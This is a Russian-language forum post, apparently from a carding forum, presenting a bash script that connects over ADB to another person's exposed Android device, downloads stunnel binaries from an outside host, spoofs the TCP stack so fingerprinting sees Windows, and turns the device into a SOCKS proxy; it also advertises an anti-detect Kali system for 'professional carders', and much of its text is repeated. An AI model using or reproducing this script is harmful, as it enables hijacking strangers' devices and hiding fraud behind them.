Пожалуйста, обратите внимание, что пользователь заблокирован
Итак! Смотрю темка всех задела) кто-то пишет - плагиат, аффтор жжот и прочее) вполне норм реакция людей. Поехали, часть 2 так сказать)
Иногда всем нам требуется подключение от имени того самого буржуя. Тем более что практической пользы от андроид-раба мало, а извлечь сможет еще меньше количество народа. В этой теме я постараюсь заинтересовать Вас немного больше) Пишем, баш:
Огонь! Пытаемся таким (на вашей машине естественно) образом:
Для особо страждущих понять где я пизжю материал : в интернете. Все новое - хорошо забытое старое. Остается только понять - как этим всем пользоваться. Все скрипты я пишу сам, под свою систему и под свои нужды. Заметки - естественно сам. Если есть какие-то вопросы - пишем! Если есть чего добавить - я с радостью выслушаю! Всем добра и отличного настроения!
ЗЫ: до этого ни на одном форуме не сидел, да есть где-то реги, смотрим историю сообщений и понимаем что активность начал только вчера)
ЗЫЫ: скоро анонсирую свою систему. В данный момент ищу людей, которые помогут мне в распространении, рекламе и финансовой части будущей деятельности. Приоткрою завесу тайны: система на базе GNU Debian, дистрибутив естественно Kali. Что может: куча моих наработок, скриптов, беспрецендентные меры в плане безопасности и анонимности. Создает виртуальные машины Windows из любого (лучше официального) .iso таким образом, что ни софт , ни бразуер никогда не скажут что это VM. Система активно разрабатывается и тестируется уже 2 года, вылизана, глюков - либо практически нет, либо (в зависимости от Вашей модели ноутбука -- да-да стац-компы для нее пока темный лес) минимальное количество. Подойдет как профессиональным кардерам, так и людям, ценющим свою безопасность и анонимность пребывание в сети. Так же поддерживает загрузку напрямую в ОЗУ и работу без жесткого диска (Live режим). Следим)
Иногда всем нам требуется подключение от имени того самого буржуя. Тем более что практической пользы от андроид-раба мало, а извлечь сможет еще меньше количество народа. В этой теме я постараюсь заинтересовать Вас немного больше) Пишем, баш:
Bash:
#!/bin/bash
cat<<'EOF'>/usr/local/bin/adbsocks
#!/bin/bash
[[ -z "$(type adb)" ]] && apt-get -y install adb #чекаем и устанавливаем adb
[[ -z "$(ls /opt/stunnel-android)" ]] && wget -O /tmp/st.tar https://repo.x4k.dev/arm/st.tar && tar xf /tmp/st.tar -C /opt/ #скачиваем компилированные бинарники stunnel для андроид
killall -9 adb ; adb root ; timeout 8s adb connect "$1":5555 &> /dev/null ; adb devices &> /tmp/.adb #стандартная процедура убил-поднял-коннект
[[ -z "$(cat /tmp/.adb | grep -v List | grep device)" ]] && printf "\033[1;31mУстройство оффлайн!\n" && exit 0 #чек на онлайн
#А ЭТО САМЫЙ ИНТЕРЕСНЫЙ БЛОК. ТУТ МЫ ПОСЫЛАЕМ КОМАНДЫ НАПРЯМУЮ В ЯДРО АНДРОИД. ДЛЯ ЧЕГО? ВСЕ ПРОСТО, ТЕПЕРЬ p0f (Passive OS Fingerprinting) думает что наша машина - Windows. Да-да, теперь чекер говорит правильные вещи)))
cat<<'EOF'>/tmp/.anwintcp
echo 128 > /proc/sys/net/ipv4/ip_default_ttl
echo 0 > /proc/sys/net/ipv4/tcp_window_scaling
echo 0 > /proc/sys/net/ipv4/tcp_timestamps
echo 8192 87380 4194304 > /proc/sys/net/ipv4/tcp_rmem
echo 16384 > /proc/sys/net/ipv4/udp_rmem_min
echo 8192 87380 4194304 > /proc/sys/net/ipv4/tcp_wmem
echo 16384 > /proc/sys/net/ipv4/udp_wmem_min
EOF
cat /tmp/.anwintcp | adb shell
adb push /opt/stunnel-android /data/local/tmp/stunnel ; adb shell chmod 755 /data/local/tmp/stunnel #отправляем наши бинарники во временную папку и присваиваем правильные права на запуск
adb shell "echo '[socks server]\nprotocol = socks\naccept = :::20102\nPSKsecrets = psk.txt\n\n[socks client]\nclient = yes\naccept = :::4080\nconnect = localhost:20102\nPSKsecrets = psk.txt' > /data/local/tmp/conf" #записываем конфигурация stunnel в файл
adb shell "echo 'secret:codes are the best thing ever' > /data/local/tmp/psk.txt" ; adb shell "cd /data/local/tmp ; ./stunnel conf" ; adb forward tcp:4080 tcp:4080 #поехали
EOF
chmod +x /usr/local/bin/adbsocks
Огонь! Пытаемся таким (на вашей машине естественно) образом:
adbsocks АЙПИ . После выполненной команды мы получаем SOCKS5 на :20102 порту через телек буржую со стеком винды. Красиво?)))Для особо страждущих понять где я пизжю материал : в интернете. Все новое - хорошо забытое старое. Остается только понять - как этим всем пользоваться. Все скрипты я пишу сам, под свою систему и под свои нужды. Заметки - естественно сам. Если есть какие-то вопросы - пишем! Если есть чего добавить - я с радостью выслушаю! Всем добра и отличного настроения!
ЗЫ: до этого ни на одном форуме не сидел, да есть где-то реги, смотрим историю сообщений и понимаем что активность начал только вчера)
ЗЫЫ: скоро анонсирую свою систему. В данный момент ищу людей, которые помогут мне в распространении, рекламе и финансовой части будущей деятельности. Приоткрою завесу тайны: система на базе GNU Debian, дистрибутив естественно Kali. Что может: куча моих наработок, скриптов, беспрецендентные меры в плане безопасности и анонимности. Создает виртуальные машины Windows из любого (лучше официального) .iso таким образом, что ни софт , ни бразуер никогда не скажут что это VM. Система активно разрабатывается и тестируется уже 2 года, вылизана, глюков - либо практически нет, либо (в зависимости от Вашей модели ноутбука -- да-да стац-компы для нее пока темный лес) минимальное количество. Подойдет как профессиональным кардерам, так и людям, ценющим свою безопасность и анонимность пребывание в сети. Так же поддерживает загрузку напрямую в ОЗУ и работу без жесткого диска (Live режим). Следим)
Последнее редактирование: